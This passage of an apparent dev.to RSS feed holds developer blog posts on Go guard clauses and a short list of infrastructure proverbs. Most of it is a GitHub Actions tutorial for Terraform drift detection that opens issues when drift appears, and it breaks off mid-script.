    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Err&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrEmptyMethod&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrEmptyPath&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  "I Want You to Be Nice Until It's Time to Not Be Nice"
&lt;/h2&gt;

&lt;p&gt;Dalton had three rules for his bouncers at the Double Deuce. The Roadhouse pattern has three for your functions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Fail Fast, Fail at the Door&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every bad input that slips past your guard clauses is a drunk patron who made it to the bar. Now you've got a &lt;code&gt;nil&lt;/code&gt; pointer stumbling around your business logic, starting fights and breaking chairs. By the time it panics, you're three stack frames deep and the error message is useless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Sentinel Errors Tell You Who Started the Fight&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When something goes wrong at 3 AM in production, you don't want a generic "request failed" error. You want to know exactly which precondition was violated. Was it &lt;code&gt;ErrNoAPIKey&lt;/code&gt;? &lt;code&gt;ErrEmptyPath&lt;/code&gt;? &lt;code&gt;ErrNilContext&lt;/code&gt;?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Guard Clauses Are the Dress Code&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Notice how the &lt;code&gt;validateRequest&lt;/code&gt; and &lt;code&gt;validateClient&lt;/code&gt; functions read like a checklist of requirements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Context must not be nil&lt;/li&gt;
&lt;li&gt;Context must not be cancelled&lt;/li&gt;
&lt;li&gt;Method must not be empty&lt;/li&gt;
&lt;li&gt;Path must not be empty&lt;/li&gt;
&lt;li&gt;API key must be set&lt;/li&gt;
&lt;li&gt;API URL must be set&lt;/li&gt;
&lt;li&gt;HTTP client must exist&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's not just validation; that's documentation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Happy Path Stays Clean
&lt;/h2&gt;

&lt;p&gt;Look at &lt;code&gt;newRequest&lt;/code&gt; again. After the two validation calls, the rest of the function is pure business logic. No defensive &lt;code&gt;if apiKey == ""&lt;/code&gt; checks scattered throughout. No &lt;code&gt;nil&lt;/code&gt; checks before every pointer access. The Roadhouse pattern front-loads the paranoia so the rest of your code can be confident and clean.&lt;/p&gt;

&lt;p&gt;Swayze would approve.&lt;/p&gt;




&lt;p&gt;If you hated this blog, feel free to drop some hateful issues and PRs on &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>go</category>
      <category>beginners</category>
      <category>backend</category>
    </item>
    <item>
      <title>Infra Proverbs</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Thu, 18 Dec 2025 15:48:15 +0000</pubDate>
      <link>https://dev.to/rosesecurity/infra-proverbs-1ljm</link>
      <guid>https://dev.to/rosesecurity/infra-proverbs-1ljm</guid>
      <description>&lt;h2&gt;
  
  
  &lt;em&gt;Simple, Clear, Maintainable&lt;/em&gt;
&lt;/h2&gt;




&lt;p&gt;Clear is better than clever.&lt;/p&gt;

&lt;p&gt;Automate the toil, not the thinking.&lt;/p&gt;

&lt;p&gt;If you can't see it, you can't fix it.&lt;/p&gt;

&lt;p&gt;Serve the workload, not the infrastructure.&lt;/p&gt;

&lt;p&gt;Today's shortcut is tomorrow's incident.&lt;/p&gt;

&lt;p&gt;An untested backup is no backup at all.&lt;/p&gt;

&lt;p&gt;Roll out in waves, not floods.&lt;/p&gt;

&lt;p&gt;Hope is not a strategy.&lt;/p&gt;

&lt;p&gt;Be careful what you measure, because that's exactly what you'll get.&lt;/p&gt;

&lt;p&gt;The best postmortem is the one you act on.&lt;/p&gt;

&lt;p&gt;Tribal knowledge dies with the tribe.&lt;/p&gt;

&lt;p&gt;The best infrastructure is the kind you can forget about.&lt;/p&gt;

</description>
      <category>infrastructureascode</category>
      <category>devops</category>
      <category>sre</category>
      <category>terraform</category>
    </item>
    <item>
      <title>Terraform Drift Detection Powered by GitHub Actions</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 17 Dec 2025 18:08:25 +0000</pubDate>
      <link>https://dev.to/rosesecurity/terraform-drift-detection-powered-by-github-actions-3akm</link>
      <guid>https://dev.to/rosesecurity/terraform-drift-detection-powered-by-github-actions-3akm</guid>
      <description>&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. &lt;a href="https://github.com/snyk/driftctl#this-project-is-now-in-maintenance-mode-we-cannot-promise-to-review-contributions-please-feel-free-to-fork-the-project-to-apply-any-changes-you-might-want-to-make" rel="noopener noreferrer"&gt;RIP &lt;code&gt;driftctl&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Simplicity of GitHub Actions
&lt;/h2&gt;

&lt;p&gt;I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform's built-in exit codes and GitHub's issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I'll talk about that below).&lt;/p&gt;
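
&lt;p&gt;The whole system hinges on one flag: &lt;code&gt;terraform plan -detailed-exitcode&lt;/code&gt; exits 0 when state matches reality, 2 when changes (drift) are present, and 1 on error. A small shell sketch of how a workflow step can branch on that convention; the wiring around it is up to you:&lt;/p&gt;

```shell
#!/bin/sh
# Map terraform's -detailed-exitcode convention to a drift status.
# 0 = no changes, 1 = error, 2 = changes present (drift)
classify_exit() {
  case "$1" in
    0) echo "no-drift" ;;
    2) echo "drift" ;;
    *) echo "error" ;;
  esac
}

# In the real job you would run something like:
#   terraform plan -detailed-exitcode -no-color -out=tfplan
#   status=$(classify_exit "$?")
# and open a GitHub issue when status is "drift".
classify_exit 2  # prints: drift
```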

&lt;h2&gt;
  
  
  The Workflow
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Triggers and Permissions
&lt;/h3&gt;

&lt;p&gt;The workflow runs on a daily schedule and supports manual execution via &lt;code&gt;workflow_dispatch&lt;/code&gt;. We configure OIDC (&lt;code&gt;id-token: write&lt;/code&gt;) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Drift Detection&lt;/span&gt;

&lt;span class="c1"&gt;# We can also add some fancy logic to extract this from a Dockerfile&lt;/span&gt;
&lt;span class="c1"&gt;# or versions.tf so we don't have to continually monitor and bump this.&lt;/span&gt;
&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;TF_VERSION&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1.X.X&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;workflow_dispatch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;cron&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;00&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;6&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*"&lt;/span&gt; &lt;span class="c1"&gt;# Every day at 06:00 UTC&lt;/span&gt;

&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# This is required for requesting the JWT and opening issues&lt;/span&gt;
  &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
  &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;
  &lt;span class="na"&gt;pull-requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
  &lt;span class="na"&gt;issues&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Finding Root Modules
&lt;/h3&gt;

&lt;p&gt;This job dynamically discovers all Terraform root modules in the repository by searching for &lt;code&gt;.tf&lt;/code&gt; files while excluding module subdirectories and the &lt;code&gt;.terraform&lt;/code&gt; cache. The &lt;code&gt;find&lt;/code&gt; command output is transformed into a JSON array using &lt;code&gt;jq&lt;/code&gt;, enabling parallel drift detection across multiple environments via a matrix strategy. The exact paths may differ depending on your Terraform structure, but the general idea is to build a matrix of Terraform root modules that we can run &lt;code&gt;terraform plan&lt;/code&gt; against.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;find-terraform-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Find&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Terraform&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Directories'&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;outputs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;terraform-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ steps.fetch-environments.outputs.dirs }}&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Checkout code&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4.2.2&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Fetch Environments&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;fetch-environments&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;# Create a matrix of Terraform root modules&lt;/span&gt;
          &lt;span class="s"&gt;DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')&lt;/span&gt;
          &lt;span class="s"&gt;echo "dirs=$DIRS" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
          &lt;span class="s"&gt;echo "Found environments: $DIRS"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
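&lt;p&gt;To see what that pipeline produces, here is a miniature, hypothetical repo layout run through the same &lt;code&gt;find&lt;/code&gt;/&lt;code&gt;jq&lt;/code&gt; transformation (the directory names are made up for illustration):&lt;/p&gt;

```shell
# Build a throwaway layout: two root modules plus a shared module dir.
demo="$(mktemp -d)"
mkdir -p "$demo/environments/dev" "$demo/environments/prod" "$demo/modules/vpc"
touch "$demo/environments/dev/main.tf" "$demo/environments/prod/main.tf" "$demo/modules/vpc/main.tf"
cd "$demo"

# Same pipeline as the workflow: module dirs are excluded, and jq turns
# the newline-separated directory list into a compact JSON array.
find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" \
  -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]'
# → ["./environments/dev","./environments/prod"]
```

&lt;p&gt;Module subdirectories drop out, and the resulting JSON array is exactly what &lt;code&gt;fromJson()&lt;/code&gt; feeds into the matrix.&lt;/p&gt;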



&lt;h3&gt;
  
  
  Credential Configuration and Setup
&lt;/h3&gt;

&lt;p&gt;The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with &lt;code&gt;fail-fast: false&lt;/code&gt; to ensure one environment's failure doesn't block the others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with &lt;code&gt;terraform_wrapper: false&lt;/code&gt; to ensure clean exit code propagation. OIDC requires some one-time setup on the AWS side (an IAM identity provider for GitHub plus a role trust policy), but it's the recommended approach for secure, keyless authentication.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;  &lt;span class="na"&gt;drift-detection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Drift&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Detection'&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;find-terraform-envs&lt;/span&gt;
    &lt;span class="na"&gt;if&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;needs.find-terraform-envs.outputs.terraform-envs != '[]'&lt;/span&gt;
    &lt;span class="na"&gt;strategy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;fail-fast&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;matrix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;tf_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ fromJson(needs.find-terraform-envs.outputs.terraform-envs) }}&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Checkout code&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4.2.2&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Configure AWS Credentials&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-actions/configure-aws-credentials@v4.1.0&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;aws-region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
          &lt;span class="na"&gt;role-to-assume&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.AWS_ROLE }}&lt;/span&gt;
          &lt;span class="na"&gt;role-session-name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Drift_Detection&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Set up Terraform&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hashicorp/setup-terraform@v3.1.2&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;terraform_version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ env.TF_VERSION }}&lt;/span&gt;
          &lt;span class="na"&gt;terraform_wrapper&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Init&lt;/span&gt;
        &lt;span class="na"&gt;working-directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ matrix.tf_dir }}&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terraform init -input=false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Detecting Drift
&lt;/h3&gt;

&lt;p&gt;This is the core drift detection mechanism. The &lt;code&gt;terraform plan -detailed-exitcode&lt;/code&gt; command returns one of three exit codes: &lt;code&gt;0&lt;/code&gt; (no changes), &lt;code&gt;1&lt;/code&gt; (error), or &lt;code&gt;2&lt;/code&gt; (drift detected). We capture Terraform's actual exit code using &lt;code&gt;${PIPESTATUS[0]}&lt;/code&gt; rather than &lt;code&gt;$?&lt;/code&gt;, which would only return &lt;code&gt;sed&lt;/code&gt;'s exit code from the end of the pipeline. The plan output is filtered and saved for issue creation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technical Note:&lt;/strong&gt; We use &lt;code&gt;set +e&lt;/code&gt; to prevent immediate failure, &lt;code&gt;-input=false&lt;/code&gt; to prevent hanging on interactive prompts, and &lt;code&gt;-lock-timeout=5m&lt;/code&gt; to handle state locks gracefully.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Drift Detection Plan&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;plan&lt;/span&gt;
        &lt;span class="na"&gt;working-directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ matrix.tf_dir }}&lt;/span&gt;
        &lt;span class="na"&gt;shell&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bash&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;set +e # Disable exit on error for this step&lt;/span&gt;
          &lt;span class="s"&gt;terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2&amp;gt;&amp;amp;1 | sed -n '/Terraform will perform the following actions:/,$p' &amp;gt; plan_output.txt&lt;/span&gt;
          &lt;span class="s"&gt;EXIT_CODE=${PIPESTATUS[0]}&lt;/span&gt;
          &lt;span class="s"&gt;echo "exit_code=$EXIT_CODE" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
          &lt;span class="s"&gt;echo "EXIT_CODE=$EXIT_CODE" &amp;gt;&amp;gt; "$GITHUB_ENV"&lt;/span&gt;

          &lt;span class="s"&gt;# Show the plan output&lt;/span&gt;
          &lt;span class="s"&gt;cat plan_output.txt&lt;/span&gt;

          &lt;span class="s"&gt;# Set drift detected flag&lt;/span&gt;
          &lt;span class="s"&gt;if [ $EXIT_CODE -eq 2 ]; then&lt;/span&gt;
            &lt;span class="s"&gt;echo "drift_detected=true" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
            &lt;span class="s"&gt;echo "Drift detected in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;elif [ $EXIT_CODE -eq 1 ]; then&lt;/span&gt;
            &lt;span class="s"&gt;echo "plan_failed=true" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
            &lt;span class="s"&gt;echo "Plan failed in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;else&lt;/span&gt;
            &lt;span class="s"&gt;echo "No drift detected in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;fi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Creating and Updating GitHub Issues
&lt;/h3&gt;

&lt;p&gt;When drift is detected (exit code 2), this step uses the GitHub API via &lt;code&gt;actions/github-script&lt;/code&gt; to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security Note:&lt;/strong&gt; Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.&lt;br&gt;
&lt;/p&gt;
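&lt;p&gt;As one hedged example of that sanitization, the following pass rewrites the saved plan before it reaches an issue. The patterns here (12-digit AWS account IDs and IPv4 addresses) are illustrative assumptions; tune them to whatever actually appears in your plans:&lt;/p&gt;

```shell
# Redact anything resembling an AWS account ID or an IPv4 address from
# the plan output before it is attached to a GitHub issue. These are
# deliberately broad example patterns, not an exhaustive scrub.
sed -E \
  -e 's/[0-9]{12}/REDACTED_ACCOUNT/g' \
  -e 's/([0-9]{1,3}\.){3}[0-9]{1,3}/REDACTED_IP/g' \
  plan_output.txt > plan_output_sanitized.txt
```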

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Create or Update Issue on Drift Detection&lt;/span&gt;
        &lt;span class="na"&gt;if&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;steps.plan.outputs.drift_detected == 'true'&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/github-script@v7.0.1&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;script&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
            &lt;span class="s"&gt;const fs = require('fs');&lt;/span&gt;
            &lt;span class="s"&gt;const path = require('path');&lt;/span&gt;
            &lt;span class="s"&gt;let planOutput = '';&lt;/span&gt;
            &lt;span class="s"&gt;try {&lt;/span&gt;
              &lt;span class="s"&gt;planOutput = fs.readFileSync(path.join('${{ matrix.tf_dir }}', 'plan_output.txt'), 'utf8');&lt;/span&gt;
            &lt;span class="s"&gt;} catch (error) {&lt;/span&gt;
              &lt;span class="s"&gt;planOutput = 'Could not read plan output';&lt;/span&gt;
            &lt;span class="s"&gt;}&lt;/span&gt;

            &lt;span class="s"&gt;const title = `Terraform Drift Detected: ${{ matrix.tf_dir }}`;&lt;/span&gt;
            &lt;span class="s"&gt;const driftBody = `## Terraform Drift Detected&lt;/span&gt;
            &lt;span class="s"&gt;**Directory:** \`${{ matrix.tf_dir }}\`&lt;/span&gt;
            &lt;span class="s"&gt;**Detection Time:** ${new Date().toISOString()}&lt;/span&gt;
            &lt;span class="s"&gt;**Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})&lt;/span&gt;
            &lt;span class="s"&gt;&amp;lt;details&amp;gt;&lt;/span&gt;
            &lt;span class="s"&gt;&amp;lt;summary&amp;gt;Plan Output&amp;lt;/summary&amp;gt;&lt;/span&gt;

            &lt;span class="s"&gt;\`\`\`&lt;/span&gt;
            &lt;span class="s"&gt;${planOutput}&lt;/span&gt;
            &lt;span class="s"&gt;\`\`\`&lt;/span&gt;

            &lt;span class="s"&gt;&amp;lt;/details&amp;gt;&lt;/span&gt;
            &lt;span class="s"&gt;Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;&lt;/span&gt;

            &lt;span class="s"&gt;// Search for existing open drift issue for this directory&lt;/span&gt;
            &lt;span class="s"&gt;const issues = await github.rest.issues.listForRepo({&lt;/span&gt;
              &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
              &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
              &lt;span class="s"&gt;state: 'open',&lt;/span&gt;
              &lt;span class="s"&gt;labels: ['drift-detection']&lt;/span&gt;
            &lt;span class="s"&gt;});&lt;/span&gt;

            &lt;span class="s"&gt;const existingIssue = issues.data.find(issue =&amp;gt;&lt;/span&gt;
              &lt;span class="s"&gt;issue.title.includes('Terraform Drift Detected') &amp;amp;&amp;amp;&lt;/span&gt;
              &lt;span class="s"&gt;issue.title.includes('${{ matrix.tf_dir }}')&lt;/span&gt;
            &lt;span class="s"&gt;);&lt;/span&gt;

            &lt;span class="s"&gt;if (existingIssue) {&lt;/span&gt;
              &lt;span class="s"&gt;// Update existing issue with new drift info&lt;/span&gt;
              &lt;span class="s"&gt;await github.rest.issues.createComment({&lt;/span&gt;
                &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
                &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
                &lt;span class="s"&gt;issue_number: existingIssue.number,&lt;/span&gt;
                &lt;span class="s"&gt;body: `## New Drift Detected\n\n${driftBody}`&lt;/span&gt;
